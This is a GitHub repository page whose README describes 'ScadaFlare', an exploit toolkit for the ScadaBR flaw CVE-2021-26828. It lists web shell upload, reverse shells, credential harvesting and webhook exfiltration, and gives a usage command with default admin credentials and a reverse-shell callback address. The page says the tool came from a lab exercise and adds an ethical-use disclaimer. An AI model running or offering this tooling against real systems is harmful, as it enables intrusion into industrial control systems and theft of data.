Skip to content

ridpath/CVE-2021-26828-Ultimate

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
scadaflare-demo.png
scadaflare-demo.png
 
 
scadaflare.py
scadaflare.py
 
 

Repository files navigation

ScadaFlare - CVE-2021-26828 Authenticated RCE Exploitation Toolkit

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

A modular post-auth RCE exploit targeting ScadaBR <1.1.0, enhanced for red team ops.

ScadaFlare Demo

Features

  • Uploads weaponized .jsp shell via view_edit.shtm
  • Supports Linux & Windows payloads
  • SOCKS5 / HTTP proxy support
  • Reverse shell trigger (standard or base64)
  • Enumeration modules (DB, creds, Log4Shell, etc.)
  • Webhook exfil (Slack / Discord)
  • Metasploit resource script generation
  • Cleanup support (kill switch)

MITRE ATT&CK Technique Mapping

Phase Technique ID
Initial Access (post-auth) Valid Accounts T1078
Execution Exploit Public-Facing Application T1190
Command Execution Web Shell T1505.003
Privilege Actions Modify Web Content T1505
Credential Access Credential in Configuration Files T1552.001
Discovery Remote System Discovery T1018
Exfiltration Exfiltration Over Web Service T1567.002
Defense Evasion Proxy & Protocol Tunneling T1090

CVE

  • CVE-2021-26828
  • Discovered by Fellipe Oliveira
  • Exploit enhanced & modularized

Why This Exists

This exploit was developed during analysis of the HTB Pro Lab: Alchemy scenario. The original PoC by Fellipe Oliveira was solid but:

Written in Python 2

Lacked modern features like proxy support, shell cleanup, enumeration chaining

Was difficult to extend or integrate into red team workflows

This version, ScadaFlare, is a full rewrite in Python 3 with modular support, multiple evasion strategies, OS detection override, webhook integration, SOCKS proxy support, and enumeration chains for real world operator use.

Usage

python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

Legal & Ethical Use Only

ScadaFlare is designed solely for:

  • Ethical hacking education
  • SCADA lab testing
  • Defensive research & vulnerability validation

Unauthorized use against real industrial systems can:

  • Disrupt physical processes
  • Cause damage or safety hazards
  • Result in severe legal consequences

By using this tool you accept full responsibility for:

  • Obtaining explicit written authorization
  • Operating only within approved environments

License

MIT License – see LICENSE

About

ScadaFlare Authenticated RCE Exploit Framework for ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

Topics

reverse-shell exploit ctf ics alchemy scada exploitation ics-security redteam scada-security htb htb-scripts scadabr cve-2021-26828

Resources

Readme

License

MIT license
Activity

Stars

2 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages